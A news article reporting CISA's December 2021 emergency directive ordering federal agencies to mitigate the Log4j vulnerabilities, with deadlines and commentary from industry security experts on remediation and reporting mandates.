CISA Issues Emergency Directive on Log4j
In an effort to heighten the alert level for a series of vulnerabilities in the popular Java-based logging library Log4j, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive. The vulnerabilities, first disclosed December 9, 2021, are under active exploitation by multiple threat actors.
CISA has determined that this vulnerability poses an unacceptable risk to federal civilian executive branch agencies and requires emergency action, and the directive instructs those agencies to take actions to mitigate vulnerabilities to the Apache Log4j flaw, as well as cyberattacks exploiting it.
CISA Issues Emergency Directive on Log4j: Unacceptable Risk
The exploitation of any one of these vulnerabilities allows an unauthenticated attacker to remotely execute code on a server.
Successful exploitation can occur even if the software accepting data input is not written in Java, and such software is able to pass malicious strings to other (backend) systems that are written in Java.
The directive instructs agencies to remove any affected software assets from their networks by December 23, 2021 and report all affected software applications by December 28, 2021.
“This determination is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems,” the directive stated.
The current version of the emergency directive prioritized solution stacks accepting data input from the internet; however, CISA strongly recommended the same actions be applied to the entirety of agencies’ infrastructure.
The CISA directive also noted that as this is an evolving situation, the agency planned to issue supplemental direction applicable to broader agency-owned information technologies (IT) and operational technologies (OT).
By February 15, 2022, CISA will provide a report to the Secretary of Homeland Security and the Director of the Office of Management and Budget (OMB) identifying cross-agency status and outstanding issues.
“CISA will continue to work with our partners to monitor for active exploitation associated with these vulnerabilities and will notify agencies and provide additional guidance, as appropriate,” the directive noted. “[The agency] will provide technical assistance to agencies who are without internal capabilities sufficient to comply with this directive.”
CISA also urged critical infrastructure owners and operators to take immediate steps to strengthen their computer network defenses against potential malicious cyberattacks in light of persistent and ongoing cyberthreats and the lead-up to the holidays.
Among the recommendations, CISA recommended IT security leaders ensure network defenders implement cybersecurity best practices, increase organizational vigilance and prepare their organizations for rapid response.
“Have staff check reporting processes and exercise continuity of operations plans to test your ability to operate key functions in an IT-constrained or otherwise degraded environment,” CISA said in its December 15, 2021 advisory. “Consider your organization’s cross-sector dependencies and the impact that a potential incident at your organization may have on other sectors, as well as how an incident at those sectors could affect your organization.”
Dor Dali, director of information security at Vulcan Cyber, a provider of SaaS for enterprise cybersecurity risk remediation, explained that every cybersecurity organization knows they need to take action to mitigate Log4Shell.
The question is: What action is necessary for their environment?
“The unfortunate answer is, ‘It depends’,” Dali said. “If a federal agency needs to be told to take action, there is also a really good chance they don’t know their security posture rating specific to Log4j and they are scrambling to know where to start.”
Dali recommends they use at least one vulnerability scanner, subscribe to a threat intelligence feed, compile asset data and establish threat tolerance levels and risk SLAs.
“Aggregate all of this data by organizational or functional groupings within the agency to make it manageable and then start prioritizing and delegating the work of mitigation,” he said. “You can’t fix what you don’t understand, making it imperative to first get a holistic view of Log4Shell risk posture before chasing ghosts in the machine.”
‘Ankle Biters and Script Kiddies’
Jake Williams, co-founder and CTO at BreachQuest, an incident response specialist, added there’s no doubt that threat actors targeting the U.S. government will use this vulnerability, however, he wouldn’t expect it to be those at the top of the food chain.
“At this point, every IDS and network security monitoring solution is looking for Log4j JNDI exploits, so if you’re a nation-state threat actor looking to establish long-term persistence for intelligence operations, using this makes little sense,” he said. “At this stage, CISA’s directive is mostly protecting agencies from ankle biters and script kiddies.”
He explained the need for caution when mandating reporting requirements, especially in response to high-profile vulnerability events such as Log4j—while Log4j is consuming the news cycle right now, it might appear to be a good time to push additional reporting requirements. Those additional requirements, however well-intended, could have negative repercussions.
“However, policymakers should ensure that they don’t unintentionally cause operational issues by mandating reporting,” Williams said. “Additionally, the breach reporting has to serve some purpose. There must be a direct line connected between the breach reported and an increase in public security posture.”
